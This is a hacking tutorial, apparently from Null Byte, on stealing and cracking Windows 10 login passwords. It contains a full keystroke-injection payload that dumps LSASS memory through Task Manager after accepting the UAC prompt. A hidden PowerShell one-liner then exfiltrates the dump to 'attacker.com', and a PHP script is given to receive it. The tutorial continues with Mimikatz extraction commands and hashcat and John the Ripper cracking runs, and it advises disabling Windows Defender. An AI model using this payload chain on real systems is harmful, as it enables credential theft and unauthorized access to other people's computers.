Hacking Windows 10: How to Dump NTLM Hashes & Crack Windows Passwords

How to Dump NTLM Hashes & Crack Windows Passwords

Windows 10 passwords stored as NTLM hashes can be dumped and exfiltrated to an attacker's system in seconds. The hashes can be very easily brute-forced and cracked to reveal the passwords in plaintext using a combination of tools, including Mimikatz, ProcDump, John the Ripper, and Hashcat.

Before we get to any of that, let's discuss the Local Security Authority Subsystem Service (LSASS), an essential part of the Windows operating system.

LSASS is responsible for authoritative domain authentication, active directory management, and enforcing security policies. It generates the processes accountable for authenticating users with NTLM as well as verifies the validity of logins. Because it's so crucial to the functionality of the operating system, hackers will often rename malicious executables after the process.

Mimikatz & ProcDump

Mimikatz, created by gentilkiwi, can be used to extract password hashes, Kerberos tickets, and PIN codes from Windows 10's memory. Since its creation, Mimikatz has made headlines worldwide and become notorious for its ability to extract sensitive credentials from a running Windows computer.

Today, Windows Defender and antivirus software have become increasingly effective at detecting Mimikatz executions and signatures (shown below).

VirusTotal detection rates for latest Mimikatz version.

In combination with Mimikatz, hackers now use ProcDump, a standalone executable designed for administrators to monitor application crash dumps.

ProcDump is used to extract the LSASS dump, which is later moved to an offline Windows 10 computer and analyzed with Mimikatz. This is still an effective technique for extracting credentials from Windows 10, as ProcDump is a signed Microsoft binary and does not get flagged by most antivirus software (shown below).

The Windows 10 Task Manager can also be used to dump LSASS memory, without the help of Mimikatz or ProcDump. Below is an example Mousejack payload designed to extract and exfiltrate the LSASS dump with only keystroke injection exploits and PowerShell. The attack is completed in under ten seconds (it has been slowed down at certain points for interpretation).

The Task Manager is opened in the Run window with administrative privileges. The screen turns entirely dark for a second due to the User Access Control (UAC) prompt, which prevents the GIF creator from recording the screen. Then, the Local Security Authority Process (lsass.exe) is located in the list of processes and dumped into the %TEMP% directory (by default). A PowerShell one-liner is then executed entirely from the run window. It compresses the LSASS dump into a ZIP file and sends it to the attacker's server.

At this point, the attacker can use Mimikatz in an offline Windows 10 computer or virtual machine (that doesn't have antivirus software installed) to extract hashed passwords.

Step 1: Create the Keystroke Injection Payload

The below keystroke injection payload can be invoked with Mousejack vulnerabilities or a USB Rubber Ducky.

While MouseJack vulnerabilities were disclosed several years ago, tens of millions of keyboards and mice (including Logitech devices) are still suspectable to keystroke injection. As Marcus Mengs, creator of P4wnP1 illustrates in his proof of concept video, Logitech dongles are still vulnerable to remote attacks.

Comments (REM) have been added to each line in the payload to clarity.

REM 2.5 second delay to give Windows 10 some time to properly
REM mount the USB Rubber Ducky. This initial delay isn't
REM required with Mousejack attacks.
DELAY 2500

REM Open the run command window.
GUI r

REM Allow the run command window 1 second to open.
DELAY 1000

REM Type "taskmgr" (i.e., Task Manager) into the run window.
STRING taskmgr

REM Delay for .5 seconds.
DELAY 500

REM Ctrl+Shift+Enter keyboard combination is pressed to invoke
REM the User Account Control (UAC) window. This will cause
REM taskmgr to open with administrative privileges.
CTRL+SHIFT ENTER

REM Allow the UAC window to popup. This can take several seconds
REM on some Windows 10 machines.
DELAY 2500

REM ALT+y keyboard combination to accept and bypass the UAC
REM prompt.
ALT y

REM Allow several seconds for Task Manager to fully open with
REM admin privileges. This took (on average) 5.5 seconds in my
REM tests. In some scenarios, with high-end CPUs, this delay
REM can be considerably lower.
DELAY 5500

REM Press down on the keyboard to move from the tool bar to the
REM list of active background processes.
DOWN

REM Type "local" to jump down and highlight the "Local Security
REM Authority Service" processes.
STRING local

REM SHIFT+F10 keyboard combination invokes the right-click options
REM menu.
SHIFT F10

REM Allows 1.2 seconds for the options menu to fully open.
DELAY 1200

REM Press down on the keyboard 4 times to highlight the "Create
REM dump file" option.
DOWN
DOWN
DOWN
DOWN

REM Press Enter to select the "Create dump file" option.
ENTER

REM Allow 3.5 seconds for the dump file to create and save itself
REM to the %TEMP% directory.
DELAY 3500

REM Press Enter to select "OK" and close the dump popup window.
ENTER

REM ALT+F4 combination to close the Task Manager window.
ALT F4

REM Allow .7 seconds for the Task Manager to close.
DELAY 700

REM Open the run command window again.
GUI r

REM Allow .7 seconds for the run window to open.
DELAY 700

REM PowerShell one-liner to compress and exfiltrate the LSASS
REM dump file. Each part of the one-liner is explained in greater
REM detail below.
STRING powershell -ep bypass /w 1 /C $t=$env:temp;$l='lsass.DMP';compress-archive -path $t\$l -destinationpath $t\a.zip;iwr attacker.com/i.php -method POST -infile $t\a.zip

REM Press Enter to execute the PowerShell one-liner.
ENTER

The PowerShell payload consists of several commands chained together by semicolons:

  • powershell -ep bypass /w 1 /C — The ExecutionPolicy (-ep) is set to "bypass" to allow PowerShell execution through Windows Defender and some antivirus software. The WindowStyle (/w) is set to "1," which immediately hides the PowerShell pop-up terminal.
  • $t=$env:temp; — The target's temp directory is set to the variable $t. The single-letter variable usage helps shorten the overall length of the payload; It's more effective than typing "C:\Users\%USERNAME%\AppData\Local\Temp" over and over again.
  • $l='lsass.DMP'; — The lsass.DMP file name is set to the variable $l. This filename is defined by the Task Manager automatically.
  • compress-archive -path $t\$l -destinationpath $t\a.zip; — PowerShell's Compress-Archive cmdlet is used to zip the lsass.DMP (-path) into the "a.zip" (-destinationpath) file.
  • iwr attacker.com/i.php -method POST -infile $t\a.zipInvoke-Webrequest (iwr) sends the a.zip (-infile) to the attacker's server in the form of a POST request. Be sure to change "attacker.com" to Kali's local IP address or virtual private server address.

Step 2: Intercept the LSASS Dump

Before performing any keystroke injection, a PHP server is needed to intercept the exfiltrated dump.

The keystroke injection payload is expecting a server on port 80. This example will use Kali Linux on a local network for simplicity, so root privileges are already in use. Setting this up on a virtual private server, however, will require root to open a listening service on port 80.

Non-Kali users can start with the following command.

~$ sudo su

Then, create a directory called "phpServer/" using the below mkdir command.

~$ mkdir phpServer/

Change into the phpServer/ directory using the cd command.

~$ cd phpServer/

Create a file called "i.php" with nano.

~$ nano i.php

Paste the below PHP script into the nano terminal. Once that's done, to save and exit the nano terminal, press Ctrl+x, then y, then Enter.

<?php
$file = date("Hism") . ".zip";
file_put_contents($file, file_get_contents("php://input"));
?>

This simple PHP script is capable of intercepting ZIP files and doesn't need to be modified in any way to function. When the target Windows 10 computer sends a .zip, this PHP server will save the data with the time as the file name.

Start the PHP server with the php -S 0.0.0.0:80 command. The -S tells PHP to start a web server, while 0.0.0.0 tells it to host the server on every IPv4 interface.

~$ php -S 0.0.0.0:80

PHP 7.3.0-2 Development Server started
Listening on http://0.0.0.0:80
Document root is /root/phpServer
Press Ctrl-C to quit.

Step 3: Extract the Hashes with Mimikatz

Once the ZIP has been intercepted, move it to a Windows 10 computer or virtual machine. Unzip it to find the lsass.DMP file.

Make sure to disable Windows Defender and other security features before downloading Mimikatz. Open the Start menu and search for "virus."

Click on the "Virus & threat protection settings" and disable all of the available options. Alternatively, a virtual machine that doesn't have Windows Defender or Smartscreen installed can be configured for Mimikatz antics.

At the time of this writing, the latest version of Mimikatz is 2.2.0, Carlos update. Open a web browser and navigate to its GitHub repository to find the latest "mimikatz_trunk.zip" version.

After unzipping the Mimikatz ZIP, open a PowerShell terminal. Use the following command to execute the mimikatz.exe, and the mimikatz prompt will appear.

C:\> PS & "C:\Users\$env:username\PATH\TO\MIMIKATZ\x64\mimikatz.exe"

  .#####.   mimikatz 2.2.0 (x64) #18362 Aug 13 2019 01:35:04
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz #

The below sekurlsa::minidump command will load the lsass.DMP into Mimikatz.

mimikatz # sekurlsa::minidump C:\Users\%USERNAME%\Documents\lsass.DMP

Switch to MINIDUMP : 'C:\Users\tokyoneon\Documents\lsass.DMP'

Then, use the sekurlsa::logonPasswords command to extract hashed credentials. Since Windows 8, plaintext passwords are no longer stored in memory without further modifying the operating system. But that doesn't mean Windows 10 hashes can be brute-forced and easily cracked. In line 12, we'll find the hashed password in NTLM format.

mimikatz # sekurlsa::logonPasswords

Opening : 'C:\Users\tokyoneon\Documents\lsass.DMP' file for minidump...

     1  Authentication Id : 0 ; 102597 (00000000:000190c5)
     2  Session           : Interactive from 1
     3  User Name         : tokyoneon
     4  Domain            : MSEDGEWIN10
     5  Logon Server      : MSEDGEWIN10
     6  Logon Time        : 5/31/2019 1:01:05 AM
     7  SID               : S-1-5-21-3859058339-3768143778-240673529-1000
     8          msv :
     9           [00000003] Primary
    10           * Username : tokyoneon
    11           * Domain   : MSEDGEWIN10
    12           * NTLM     : 7b5e40a5b7b17972ad793b9fc868a66e
    13           * SHA1     : 6076b8f4d982b55097f910b3fb5a81c801954406
    14          tspkg :
    15          wdigest :
    16           * Username : tokyoneon
    17           * Domain   : MSEDGEWIN10
    18           * Password : (null)
    19          kerberos :
    20           * Username : tokyoneon
    21           * Domain   : MSEDGEWIN10
    22           * Password : (null)
    23          ssp :
    24          credman :

    25  Authentication Id : 0 ; 102306 (00000000:00018fa2)
    26  Session           : Interactive from 1
    27  User Name         : tokyoneon
    28  Domain            : MSEDGEWIN10
    29  Logon Server      : MSEDGEWIN10
    30  Logon Time        : 5/31/2019 1:01:05 AM
    31  SID               : S-1-5-21-3859058339-3768143778-240673529-1000
    32          msv :
    33           [00000003] Primary
    34           * Username : tokyoneon
    35           * Domain   : MSEDGEWIN10
    36           * NTLM     : 7b5e40a5b7b17972ad793b9fc868a66e
    37           * SHA1     : 6076b8f4d982b55097f910b3fb5a81c801954406
    38          tspkg :
    39          wdigest :
    40           * Username : tokyoneon
    41           * Domain   : MSEDGEWIN10
    42           * Password : (null)
    43          kerberos :
    44           * Username : tokyoneon
    45           * Domain   : MSEDGEWIN10
    46           * Password : (null)
    47          ssp :
    48          credman :

    49  Authentication Id : 0 ; 74052 (00000000:00012144)
    50  Session           : Service from 0
    51  User Name         : sshd_server
    52  Domain            : MSEDGEWIN10
    53  Logon Server      : MSEDGEWIN10
    54  Logon Time        : 5/31/2019 1:01:04 AM
    55  SID               : S-1-5-21-3859058339-3768143778-240673529-1003
    56          msv :
    57           [00000003] Primary
    58           * Username : sshd_server
    59           * Domain   : MSEDGEWIN10
    60           * NTLM     : 8d0a16cfc061c3359db455d00ec27035
    61           * SHA1     : 94bd2df8ae5cadbbb5757c3be01dd40c27f9362f
    62          tspkg :
    63          wdigest :
    64           * Username : sshd_server
    65           * Domain   : MSEDGEWIN10
    66           * Password : (null)
    67          kerberos :
    68           * Username : sshd_server
    69           * Domain   : MSEDGEWIN10
    70           * Password : (null)
    71          ssp :
    72          credman :

mimikatz #

Step 4: Brute-Forcing the NTLM Hash

Research suggests most passwords are between six and eight characters, usually consisting of six letters and ending with two digits.

As a little experiment, I wanted to learn how long it would take a Raspberry Pi 3B+, common Intel i7 CPU, and GeForce GTX GPU to crack the same hash consisting of six random characters and ending with two random numbers (e.g., nchfyr56).

1. Brute-Force with Raspberry Pi 3B+ (John the Ripper)

After installing John the Ripper on a Raspberry Pi 3B+, the password (nchfyr56) was guessed in just over five hours. Considering most passwords are eight characters long, mask attacks with a Raspberry Pi are surprisingly practical for brute-forcing NTLM hashes.

~$ john -mask=?l?l?l?l?l?l?d?d --format=NT /root/Desktop/hash

Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 32/32])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status

nchfyr56         (?)

1g 0:05:19:24 DONE (2018-06-22 16:36) 0.000052g/s 1389Kp/s 1389Kc/s 1389KC/s achfyr56..zuhfyr56
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed

2. Brute-Force with Intel i7 CPU (Hashcat CPU)

The very same NTLM hash took only three minutes to crack with an old Intel i7 but was estimated to take fifteen minutes to complete the entire keyspace.

~$ hashcat /tmp/hash -m 1000 -a3 ?l?l?l?l?l?l?d?d

hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-3537U CPU @ 2.00GHz, 2048/5809 MB allocatable, 4MCU

7b5e40a5b7b17972ad793b9fc868a66e:nchfyr56

Session..........: hashcat
Status...........: Cracked
Hash.Type........: NTLM
Hash.Target......: 7b5e40a5b7b17972ad793b9fc868a66e
Time.Started.....: Fri Aug 31 21:48:25 2019 (2 mins, 50 secs)
Time.Estimated...: Fri Aug 31 21:51:15 2019 (0 secs)
Guess.Mask.......: ?l?l?l?l?l?l?d?d [8]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 35719.8 kH/s (7.23ms) @ Accel:512 Loops:128 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 6049366016/30891577600 (19.58%)
Rejected.........: 0/6049366016 (0.00%)
Restore.Point....: 344064/1757600 (19.58%)
Restore.Sub.#1...: Salt:0 Amplifier:896-1024 Iteration:0-128
Candidates.#1....: hstrxp56 -> tjoqxn56

Started: Fri Aug 31 21:48:09 2019
Stopped: Fri Aug 31 21:51:16 2019

3. Brute-Force with GeForce GTX GPU (Hashcat GPU)

The NTLM hash was cracked in under one second. This was accomplished with a fairly low-end GeForce GTX 1060 GPU.

~$ hashcat /tmp/hash -m 1000 -a3 ?l?l?l?l?l?l?d?d

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 1060 3GB, 754/3018 MB allocatable, 9MCU

7b5e40a5b7b17972ad793b9fc868a66e:nchfyr56

Session..........: hashcat
Status...........: Cracked
Hash.Type........: NTLM
Hash.Target......: 7b5e40a5b7b17972ad793b9fc868a66e
Time.Started.....: Fri Aug 31 03:00:38 2019 (0 secs)
Time.Estimated...: Fri Aug 31 03:00:38 2019 (0 secs)
Guess.Mask.......: ?l?l?l?l?l?l?d?d [8]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  4658.0 MH/s (7.06ms) @ Accel:128 Loops:32 Thr:1024 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 1094713344/30891577600 (3.54%)
Rejected.........: 0/1094713344 (0.00%)
Restore.Point....: 0/1757600 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:896-928 Iteration:0-32
Candidates.#1....: hstera12 -> eusind80
Hardware.Mon.#1..: Temp: 34c Fan: 25% Util: 92% Core:1898MHz Mem:3802MHz Bus:16

Started: Fri Aug 31 03:00:34 2019
Stopped: Fri Aug 31 03:00:39 2019

When testing stronger passwords containing eight characters and two digits (e.g., Psjhfhdd48) against the GPU, the hash was cracked in under twenty-five minutes.

~$ hashcat /tmp/hash2 -w4 -O -m 1000 -a3 ?u?l?l?l?l?l?l?l?d?d

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 1060 3GB, 754/3018 MB allocatable, 9MCU

30346ad7463810ea4d5a58090611e368:Psjhfhdd48

Session..........: hashcat
Status...........: Cracked
Hash.Type........: NTLM
Hash.Target......: 30346ad7463810ea4d5a58090611e368
Time.Started.....: Fri Aug 31 03:19:11 2019 (23 mins, 28 secs)
Time.Estimated...: Fri Aug 31 03:42:39 2019 (0 secs)
Guess.Mask.......: ?u?l?l?l?l?l?l?l?d?d [10]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 12459.0 MH/s (97.89ms) @ Accel:256 Loops:676 Thr:1024 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 17567648317440/20882706457600 (84.13%)
Rejected.........: 0/17567648317440 (0.00%)
Restore.Point....: 25985286144/30891577600 (84.12%)
Restore.Sub.#1...: Salt:0 Amplifier:0-676 Iteration:0-676
Candidates.#1....: Mackuobd48 -> Xzkmatgd48
Hardware.Mon.#1..: Temp: 73c Fan: 50% Util:100% Core:1835MHz Mem:3802MHz Bus:16

Started: Fri Aug 31 03:19:09 2019
Stopped: Fri Aug 31 03:42:40 2019

NTLM hashes of even greater integrity (eight characters + four digits) were estimated to take about two days to crack.

~$ hashcat /tmp/hash3 -w4 -O -m 1000 -a3 ?u?l?l?l?l?l?l?l?d?d?d?d

Session..........: hashcat
Status...........: Running
Hash.Type........: NTLM
Hash.Target......: aa110854b242ed77c07be54e62611464
Time.Started.....: Fri Aug 31 03:43:40 2019 (45 secs)
Time.Estimated...: Sun Sept  2 01:48:09 2019 (1 day, 22 hours)
Guess.Mask.......: ?u?l?l?l?l?l?l?l?d?d?d?d [12]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 12589.8 MH/s (96.68ms) @ Accel:256 Loops:676 Thr:1024 Vec:1
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 559804317696/2088270645760000 (0.03%)
Rejected.........: 0/559804317696 (0.00%)
Restore.Point....: 828112896/3089157760000 (0.03%)
Restore.Sub.#1...: Salt:0 Amplifier:0-676 Iteration:0-676
Candidates.#1....: Maecdesr2000 -> Xzoejixr2000
Hardware.Mon.#1..: Temp: 65c Fan: 38% Util:100% Core:1847MHz Mem:3802MHz Bus:16

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

For hackers with dedicated brute-force machines, two days is very much within the realm of realistic. With a cluster of superior GPUs, an attacker can easily crack any hash derived from a wider keyspace.

Until next time, follow me on Twitter @tokyoneon_ and GitHub. And as always, leave a comment below or message me on Twitter if you have any questions.

Cover photo by Alex Kotliarskyi/Unsplash; Screenshots by tokyoneon/Null Byte

Never Miss a Hacking or Security Guide

Get new Null Byte guides every week.

Be the First to Comment

Share Your Thoughts

  • Hot
  • Latest